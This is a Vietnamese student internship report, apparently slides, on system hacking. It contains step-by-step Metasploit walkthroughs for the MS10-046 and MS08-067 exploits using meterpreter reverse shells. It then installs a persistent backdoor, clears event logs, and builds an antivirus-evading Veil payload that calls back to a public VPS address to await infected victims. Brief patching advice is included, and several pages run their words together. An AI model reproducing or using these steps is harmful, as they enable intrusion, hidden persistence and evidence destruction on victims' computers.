trìnhsniffercũngyêucầungườisửdụngphảihiểusâu vềkiếntrúc,cácgiaothức mạng.Việcpháthiệnhệthốngbịsnifferkhôngphảiđơngiản,vìsnifferhoạtđộngở tầngrấtthấp,vàkhôngảnhhưởngtớicácứngdụngcũngnhưcácdịchvụhệthốngđócungcấp.T uynhiênviệcxâydựngcácbiệnpháphạnchếsniffercũngkhôngquá khókhănnếutatuânthủcácnguyêntắcvề bảo mậtnhư:  Khôngchongườilạtruynhậpvàocácthiếtbịtrênhệthống  Quảnlýcấuhìnhhệthốngchặtchẽ
  • 12. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 12 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP  Thiếtlậpcáckếtnốicó tínhbảomậtcaothôngquacáccơchế mãhoá. Trojans Trojans làmộtchươngtrìnhchạykhônghợplệtrênmộthệthống.Vớivaitrò nhưmộtchươngtrìnhhợppháp.Trojansnàycóthểchạy đượclàdocácchươngtrình hợpphápđãbịthayđổimãcủanóthànhmãbấthợppháp.Vídụnhưcácchươngtrình viruslàloạiđiểnhìnhcủaTrojans.Nhữngchươngtrìnhvirus thường chedấucácđoạn mãtrongcácchươngtrìnhsửdụnghợppháp.Khinhữngchươngtrìnhnày đượckích hoạtthìnhững đoạnmãẩndấusẽthực thivàchúng thựchiệnmộtsốchứcnăngmà ngườisửdụngkhôngbiếtnhư:ăncắpmậtkhẩuhoặccopy filemàngườisửdụngnhư tathườngkhônghaybiết.MộtchươngtrìnhTrojanssẽ thựchiệnmộttrongnhữngcông việcsau: Thựchiệnmộtvàichứcnănghoặcgiúpngườilậptrìnhlênnóphát hiệnnhững thôngtinquantrọng hoặcnhững thôngtincánhântrênmộthệthốnghoặcchỉ trênmột vàithànhphầncủahệthốngđó. Chedấumộtvàichứcnăng hoặc làgiúpngười lậptrìnhpháthiệnnhữngthông tinquantrọnghoặcnhữngthôngtincánhântrênmộthệthốnghoặcchỉtrênmột vài thànhphầncủahệthống.Ngoàiracòncócácchương trìnhTrojancóthểthựchiện đựợccảhaichứcnăngnày.Cóchương trìnhTrojancòncóthểpháhủy hệthốngbằng cách pháhoạicácthôngtintrênổcứng.NhưngngàynaycácTrojanskiểunàydễdàng bịpháthiệnvàkhópháthuyđượctácdụng.Tuy nhiêncónhữngtrườnghợpnghiêm trọnghơnnhữngkẻtấncôngtạo ranhữnglỗ hổngbảomậtthôngqua Trojansvàkẻ tấn cônglấyđượcquyềnroottrênhệthốngvàlợidụngquyềnđóđểpháhủymộtphần hoặctoànbộhệthốnghoặcdùngquyềnrootđểthayđổilogfile,càiđặtcácchương trìnhtrojanskhácmàngườiquảntrịkhôngthểpháthiệnđượcgâyramứcđộảnh hưởngrấtnghiêmtrọngvàngườiquảntrịchỉcòncáchcàiđặtlạitoànbộhệthống.
  • 13. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 13 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP CHƢƠNG 3. Tấn Công Hệ Thống –System Hacking I. Giới Thiệu Về Metasploit 1. Giới Thiệu Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm nhập và phát triển hệ thống phát hiện tấn công mạng. Một dự án con rất nổi tiếng của Metasploit là Metasploit Framework. Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS 2. Các Thành Phần Của Metasploit Metasploit hỗ trợ nhiều giao diện với người dùng:  Consoleinterface: dùng lệnh msfconsole. Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn  Webinterface: dùng msfweb, giao tiếp với người dùng thông qua giao diện web  Commandlineinterface: dùng msfcli Enviroment:  GlobalEnviroment:được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits  TemporaryEnviroment: được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi user interface được thực hiện
  • 14. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 14 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP 3. Sử dụng Metasploit Framework a) Chọn module exploit Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác  show exploits: xem các module exploit mà framework có hỗ trợ  useexploit_name: chọn module exploit  infoexploit_name: xem thông tin về module exploit Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các module trên www.metasploit.com hoặc qua lệnh msfupdate hoặc svn update /opt/metasploit/msf3/ b) Cấu hình module exploit đã chọn  showoptions: Xác định những options nào cần cấu hình.  set : cấu hình cho những option của module đó Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh showadvanceds c) Verify những options vừa cấu hình  check:kiểm tra xem những option đã được set chính xác chưa. d) Lựa chọn target Lựa chọn hệ diều hành nào để thực hiện  showtargets: những target được cung cấp bởi module đó  set: xác định target nào vd: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids e) Lựa chọn payload Payloadlàđoạncodemàsẽchạytrênhệthốngremotemachine,làmột phầncủavirusmáytínhđểthựcthimãđộc.  showpayloads:liệtkêranhữngpayloadcủa moduleexploithiệntại
  • 15. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 15 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP  infopayload_name:xemthôngtinchitiếtvề payloadđó  Set payload payload_name: xácđịnhpayloadmodulename.Saukhi lựachọnpayloadnào,dùnglệnh showoptionsđểxem những options củapayloadđó  showadvanced:xemnhữngadvancedoptionscủapayloadđó f) Thựcthiexploit  exploit:lệnhdùngđểthựcthipayloadcode.Payloadsauđósẽcung cấpchochúngtanhữngthôngtinvềhệthốngđượckhaithác 4. Giớithiệu Payload Meterpreter MeterpreterviếttắttừMeta- Interpreterlàmộtpayloadnângcaocótrong MetasploitFramework.Mụcđíchcủanólàđểcungcấpnhữngtậplệnhđ ểkhaithác tấncângcácmáyremote computers.Nóđượcviếttừcácdevelopers dướidạngshared object(DLL)files.Meterpretervà cácthànhphầnmởrộngđượcthựcthitrongbộnhớ, hoàntoànkhông đượcghilênđĩanên cóthể tránhđượcsựphát hiệntừcácphầnmềm chốngvirus. Meterpretercungcấpmộttậplệnhđểchúngtacóthểkhaitháctrêncách remote computers:  Fs(Filesystem):cungcấpquátrìnhtươngtácvớifilesystem  Net: cho phépxemthôngtinmạngcủa remotemachinenhưIP,route table  Process:cho phép tạo tương tác với các tiến trình trên remote machine  Sys: cho phép xem thông tin hệ thống, môi trường của remote machine a) Sử dụng module Fs  cd directory:giống lệnh cd của commandline, chuyển thư mục làm việc
  • 16. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 16 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP  getcwd: cho biết thư mục đang làm việc hiện tại  ls: liệt kê các thư mục và tập tin  upload src1 [src2 ...] dst: upload file từ src tới dst.  download src1 [src2 ...] dst: download file từ src tới dst. b) Sử dụng module Net  ipconfig: xem câu hình của card mạng của máy tính từ xa  route: xem bảng định tuyến của remote machine c) Sử dụng module Process  execute -f file [ -a args ] [ -Hc ]:Câu lệnh execute cho phép tạo ra một process mới trên remote machine và sử dụng process đó để khai thác dữ liệu  kill pid1 pid2 pid3:huỷ hoặc tắt các process đang chạy trên máy remote machine  ps: liệt kê những process của remote machine d) Sử dụng module Sys  getuid: cho biết username hiện tại của remote machine  sysinfo: cho biết thông tin về máy tính nạn nhân: hệ điều hành, phiên bản, nền tản 32bits hay 64bits 5. Cách phòng chống Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như để Metasploit không thể khai thác được lỗi Lsass_ms04_011, chúng ta phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các hệ điều hành windows. Chúng ta nên sử dụng hotfix có number là 835732 để vá lỗi trên. II. Lỗi MS10-046 (2286198) 1. Giới thiệu Đây là một lỗi rất nghiêm trọng liên quan đến Windows Shell cho tất cả các hệ điều hành bị ảnh hưởng, cho phép kẻ tấn công chiếm lấy toàn quyền điều khiển Windows và thực thi mã nguồn
  • 17. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 17 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP từ xa. Lỗi này được phát hiện vào tháng 06/2010 và đến tháng 08/2010, Microsoft tung ba bản vá lỗi. Lỗi nguy hiểm này nằm trong các tập tin "shortcut" (*.lnk) của Windows, các tập tin này thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một thư mục chứa tập tin shortcut nhúng mã độc. Các bản Windows bị ảnh hưởng bao gồm 2. Các bước tấn công a. (mạng LAN)  Khởi động Kali Linux và đăng nhập thành công , mở terminal ta được
  • 18. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 18 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Ta gõ : msfconsole và enter Để dùng mã lỗi ms10-046:search ms10-046 và enter
  • 19. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 19 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
  • 20. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 20 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Ta gõ tiếp: use exploit/windows/browser/ms10_046_shortcut_icon_dllload và enter  Dùng Lệnh show options để xem các tham số cần thiết để có thể tiến hành tấn công được: o SRVHOST: địa chỉ máy của kẻ tấn công, để lắng nghe có nạn nhân nào kết nối đến hay không o SRVPORT: cổng lắng nghe ,mặc định là http(80)
  • 21. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 21 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP  Tiếp theo ta sẽ o set payload windows/meterpreter/reverse_tcp o set srvhost 192.168.181.128 o Set lhost địa chỉ ip:set lhost 192.168.181.128 .lhost là tham số của payload mà ta vừa set ở trên exploit để khởi động server lắng nghe trên máy tấn công
  • 22. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 22 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Trên máy tính nạn nhân, tạo 1 shortcut bằng cách nhấn phải chuột vào Desktop -> New -> Shortcut Ta gõ vào địa chỉ của máy tấn công vào Type the location of the item: http://192.168.1.35/anythingvà chọn Next
  • 23. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 23 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Đặt tên cho shortcut vừa mới tạo và nhấn Finish. Ta sẽ mở shortcut này: Đợi một lát, trên máy tính tấn công ta được:
  • 24. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 24 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Dùng lệnh sessions để xem các phiên làm việc mà Metasploit đang có: Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1 là id của sessions) Và bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn công đã điều khiển được máy nạn nhân với toàn quyền. Ví dụ:
  • 25. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 25 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Lệnh sysinfo để lấy thông tin của máy nạn nhân: Lệnh rất hữu ích để sử dụng cmd (command-line): shell Lấy ip victim qua cmd(dùng ipconfig) : Xem các chương trình chạy trên máy victim (dùng tasklist):
  • 26. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 26 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Thoát cmd (dùng lệnh “exit”): sau khi hoàn thành bước xâm nhập vào máy nạn nhận, các hacker thường tiến hành bước tiếp theo là cần duy trì để sau này có thể truy cập lại dễ dàng mà không cần thực hiện nhiều công đoạn. Việc duy trì kết nối thông thường bằng cách bỏ backdoor vào máy victim Cài Backdoor trên máy victim(câu lệnh:”run persistence” –h để xem help):
  • 27. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 27 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Dựa vào trên ta dùng câu lệnh như sau: Xong , ta đã cài backdoor vào máy victim. Cho dù victim tắt máy , khi log on lên màn hình metasploit sẽ connect lại. Đễ xem backdoor của mình trên máy victim ta thấy pid của backdoor là 704 (hình trên) Ta dùng “shell” , “ tasklist” để xem . Xóa dấu vết sau khi tấn công: (dùng lệnh “clearev”)
  • 28. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 28 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Mã lỗi ms08_067 Khởi động metasploit và search mã lỗi ms08_067 Dùng lệnh show option để xem yêu cầu
  • 29. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 29 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Set các giá trị RHOST : IP victim RPORT : mặc định PAYLOAD : thư viện sử dụng LHOST : IP máy attack
  • 30. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 30 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Dùng lệnh exploit để tiến hành tấn công Quá trình tấn công hoàn tất , bây giờ có thể điều khiển được máy victim
  • 31. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 31 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Dùng lệnh screenshot để chup màn hinh victim … và còn nhiều chức năng khác .
  • 32. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 32 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP b. Triễn Khai trên vps Mã hóa bằng Veil cd Veil-Evasion ./Veil-Evasion.py list use python/meterpreter/rev_tcp set LHOST 162.250.123.132 setcompile_to exe Y generate *filename* ởđây mình dùng vpslinux Ubuntu server download putty.exe và đăng nhập
  • 33. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 33 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP download và tải metasploit + Veil gõmsfconsole và sữdụng lệnh : use exploit/multi/hander
  • 34. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 34 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP tiếp theo ta sẽ: set payload windows/meterpreter/reverse_tcp show options setlhost<dia chi ipvps> - set lhost 162.250.123.132
  • 35. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 35 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP ta được giao diện nhưsau : Xong ta gõ exploit và đợi victim nhiễm nhưbên vps . nâng quyền ta dùng getsystem – lưu ý chỉ sữdụng khi user hiện tại là administraitor
  • 36. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 36 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP III. Cách phòng chống Thường xuyên cập nhật các bản vá lỗi của Windows để trách bị hacker lợi dụng. Bản vá lỗi có tên mã là KB2286198 chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng. Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc" hay Blue Screen.
  • 37. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 37 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP TÀI LIỆU THAM KHẢO [1]. Trang Web: hackforums.net [2]. Trang Web: ubers.org [3]. Trang web :forum.whitehat.vn [4] Tài Liệu Học Tập Athena – Bộ CD System Hacking [5] Kali CookBook THE END